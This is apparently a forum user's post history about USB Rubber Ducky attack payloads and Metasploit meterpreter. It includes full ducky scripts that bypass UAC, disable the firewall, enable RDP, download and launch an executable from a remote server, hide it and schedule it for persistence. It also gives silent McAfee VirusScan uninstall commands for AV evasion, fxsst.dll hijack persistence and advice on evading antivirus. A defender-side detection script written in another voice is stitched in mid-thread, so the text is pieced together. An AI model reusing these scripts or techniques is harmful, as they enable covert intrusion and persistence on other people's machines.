TeCHemically

Posts posted by TeCHemically

  1. Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp?

    exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [*] Starting the payload handler...
    [*] <Public IP address>:60476 Request received for /JuQL...
    [*] <Public IP address>:60476 Staging connection for target /JuQL received...
    [*] Patched user-agent at offset 657384...
    [*] Patched transport at offset 657044...
    [*] Patched URL at offset 657112...
    [*] Patched Expiration Timeout at offset 657868...
    [*] Patched Communication Timeout at offset 657984...
    [*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500

  2. Correct, except only one windows on the 4th line.

    set PAYLOAD windows/x64/meterpreter/reverse_https

    Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).

    I started the 32 bit listener and created the fxsst.dll with a 32bit reverse_https payload. When it runs I get the following on my listening machine:

    Starting the payload handler...

    [*] <IP address>:5465 Request received for /JuQL...

    [*] <IP address>:5465 Staging connection for target /JuQL received...

    [*] Patched user-agent at offset 657384...

    [*] Patched transport at offset 657044...

    [*] Patched URL at offset 657112...

    [*] Patched Expiration Timeout at offset 657868...

    [*] Patched Communication Timeout at offset 657984...

    [*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500

    [-] Failed to load extension: No response was received to the core_loadlib request.

  3. After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got no change. I checked the SD cards on 2 other PCs (one Linux, one Windows) and on the Windows PC I got "I/O" errors in the pop up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)

    Ok, after further testing this seems to be being caused by read/write errors likely associated with the ducky drive not unmounting correctly. No matter if I dismount from Windows Explorer or the system tray, it still stays visible and navigable in the Windows Explorer window. I have told it to dismount from the Explorer window and the system tray many times and it always throws up the "safe to remove" balloon; but alas, once I do remove it I get alternating fast and slow red blinking and no drive mount or code execution on the twin duck whenever it is inserted into any client. I have reflashed the firmware to no avail. Is anyone else having these SD card corruption/dismount errors?

    EDIT: putting the "inject.bin" file on the root with 2 other file folders causes this thing to fail. If I remove the inject.bin I am able to mount ducky storage. So with any payload on it the thing totally fails. With no payload the storage will mount. If I have the payload there but named incorrectly then I still have access to the storage. I am only seeing this failure now with the payload on the root of the SD named properly (inject.bin).

  4. I am very interested in this as well. I was looking at scriptjunkie's article "Why Encoding Does not Matter and How Metasploit Generates EXEs" and was wondering how I could implement the C output of my custom shellcode into a custom or pre-existing exe. Any resources and/or advice is greatly appreciated!

  5. scriptjunkie detailed this type of thing in an article on his site called "Why Encoding Does not Matter and How Metasploit Generates EXEs". So, should I attempt to modify an existing exe or is it simpler to create my own for this purpose?

  6. If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.

    I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe/exe template that I can use for AV evasion? I have a thread on this started under security; if you could shed some light that would be amazing, thanks for all your help! :)
  7. I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!

  8. Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

    ~skysploit

    So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar?

  9. Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

    ~skysploit

    Beautiful, great work man! I just watched your vid. You have yourself another subscriber.

  10. Correct, except only one windows on the 4th line.

    set PAYLOAD windows/x64/meterpreter/reverse_https

    Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).

    Great, thanks so much! :D

  11. You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit)

    The x86 Meterpreter reverse https is here:

    payload/windows/meterpreter/reverse_https (The one I expect you used)

    The x64 one is here

    payload/windows/x64/meterpreter/reverse_https

    Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode.

    You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D

  12. After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got no change. I checked the SD cards on 2 other PCs (one Linux, one Windows) and on the Windows PC I got "I/O" errors in the pop up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)

  13. I am also having issues with Twin Duck original firmware. It has been functional through my testing today but just about a half hour ago the DUCKY storage drive no longer mounts and the inject.bin does not run either. Tried on 2 PCs. I get an alternating fast and slow red LED flashing on one PC and I get no lights at all on the other. The storage will mount if I put the SD card in another reader.

  14. I found the following little tidbit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D

    VirusScan Enterprise (VSE) command line removal using msiexec.exe:

    1. Click Start, Run.
    2. Type the removal string for your version of VSE, then click OK.

      VirusScan Enterprise 8.8
      msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q
      VirusScan Enterprise 8.7i
      msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q
      VirusScan Enterprise 8.5i
      msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q

      VirusScan Enterprise 8.0i
      msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q

    Switches that you can use with msiexec.exe:

    /q  The quiet switch ensures the removal is done silently - nothing is displayed.
    /x  This switch will automatically remove an installation.
    /i  This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation.
    /?  This switch provides additional information on all msiexec.exe command switches.
  15. Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never be detected by an AV.

    As far as persistence goes, the startup folder is one way, but is usually picked up by AV.

    Or put Meterpreter into a dll file and call it "fxsst.dll" and throw it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service.

    Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method!

  16. This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level.

    Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connection being so noticeable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thanks again!

  17. Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case the connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management".

    DELAY 5000
    ESCAPE
    DELAY 400
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    MENU
    DELAY 400
    STRING a
    DELAY 700
    ALT Y
    DELAY 800
    ENTER
    STRING netsh firewall set opmode disable
    ENTER
    DELAY 300

    STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    ENTER
    DELAY 300
    STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    ENTER
    DELAY 300
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
    ENTER
    DELAY 300
    STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"
    ENTER
    DELAY 300
    STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2
    ENTER
    DELAY 300
    STRING y
    ENTER
    STRING exit
    ENTER
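Seen from the defender's side, every step of the script above (firewall off, RDP enabled in the registry, an exe pulled into the Startup folder, hidden with attrib, re-launched by a scheduled task) and the silent msiexec AV uninstall from the VirusScan post further up leave distinctive process command lines; the fxsst.dll drop into C:\Windows leaves a file write. The following is an added example, not code from the thread or from simple-ducky: the events are constructed (the example.invalid host and the C:\Users\u profile are made up), and the rule names and regexes are my own assumptions about what a process-creation or file-write sensor records.

```python
import re

# Constructed sample telemetry (not from the thread): (source, text) pairs
# imitating process command lines and file-write paths a sensor would log.
STARTUP = ("C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows"
           "\\Start Menu\\Programs\\Startup")
SAMPLE_EVENTS = [
    ("cmdline", "netsh firewall set opmode disable"),
    ("cmdline", 'reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control'
                '\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("cmdline", "powershell (new-object System.Net.WebClient).DownloadFile("
                "'http://example.invalid/winmgmt.txt','" + STARTUP + "\\winmgmt.exe')"),
    ("cmdline", 'attrib +H +S "' + STARTUP + '\\winmgmt.exe"'),
    ("cmdline", 'schtasks /create /tn Management /tr "' + STARTUP
                + '\\winmgmt.exe" /sc hourly /mo 2'),
    ("cmdline", "msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q"),
    ("filewrite", "C:\\Windows\\fxsst.dll"),
    ("cmdline", "notepad.exe C:\\Users\\u\\notes.txt"),   # benign control event
]

# Rule names are my own; each regex targets one step of the posted scripts.
RULES = [
    ("firewall_disabled", "cmdline", r"netsh\s+firewall\s+set\s+opmode\s+disable"),
    ("rdp_enabled_in_registry", "cmdline", r"reg\s+add\s.*fDenyTSConnections.*\s/d\s+0\b"),
    ("exe_downloaded_to_startup", "cmdline", r"DownloadFile\(.*\\Startup\\.*\.exe"),
    ("startup_exe_hidden", "cmdline", r"attrib\s.*\+[HS].*\\Startup\\.*\.exe"),
    ("schtask_runs_startup_exe", "cmdline", r"schtasks\s+/create\s.*\\Startup\\.*\.exe"),
    ("silent_av_uninstall", "cmdline",
     r"msiexec(\.exe)?\s+/x\s+\{[0-9A-F-]{36}\}.*REMOVE=ALL.*/q"),
    ("fxsst_dll_in_windows_dir", "filewrite", r"^[A-Z]:\\Windows\\fxsst\.dll$"),
]

def scan_events(events):
    """Return [(rule_name, text)] for every event that matches a rule."""
    hits = []
    for source, text in events:
        for name, src, pattern in RULES:
            if src == source and re.search(pattern, text, re.IGNORECASE):
                hits.append((name, text))
    return hits

def chained_score(events):
    """Distinct rules hit: several steps of one chain on a host outweigh any single line."""
    return len({name for name, _ in scan_events(events)})

if __name__ == "__main__":
    for name, text in scan_events(SAMPLE_EVENTS):
        print(f"{name:28s} {text[:70]}")
    print("distinct techniques observed:", chained_score(SAMPLE_EVENTS))
```

Matching on the whole chain rather than single commands is what keeps this useful: `attrib +H +S` or a `schtasks /create` alone is common admin activity, but several of these on one host within minutes is worth an alert.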

  18. This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D

    ******************************************************************************************************************************

    DELAY 5000
    ESCAPE
    DELAY 400
    CONTROL ESCAPE
    DELAY 400
    STRING cmd
    DELAY 400
    MENU
    DELAY 400
    STRING a
    DELAY 700
    ALT Y
    DELAY 800
    ENTER
    STRING netsh firewall set opmode disable
    ENTER
    DELAY 300
    STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    ENTER
    DELAY 300
    STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    ENTER
    DELAY 300
    STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
    ENTER
    STRING exit
    ENTER

    ******************************************************************************************************************************

    You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above.

    Then in terminal type the following 2 commands:

    cd /usr/share/ducky/encoder

    (for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in)

    java -jar encoder.jar -i payload.txt -o inject.bin

    (now place the "inject.bin" file on your ducky and use as you normally would)

  19. Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

    Everything appears to have been successful on the client side; but I don't get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue.

    EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.

  20. Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.

    No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)

  21. Great script, I am super excited to test this one out :D

    One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 minutes ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:

    [*] Generating shellcode
    /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)
    from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
    from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'

    Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)
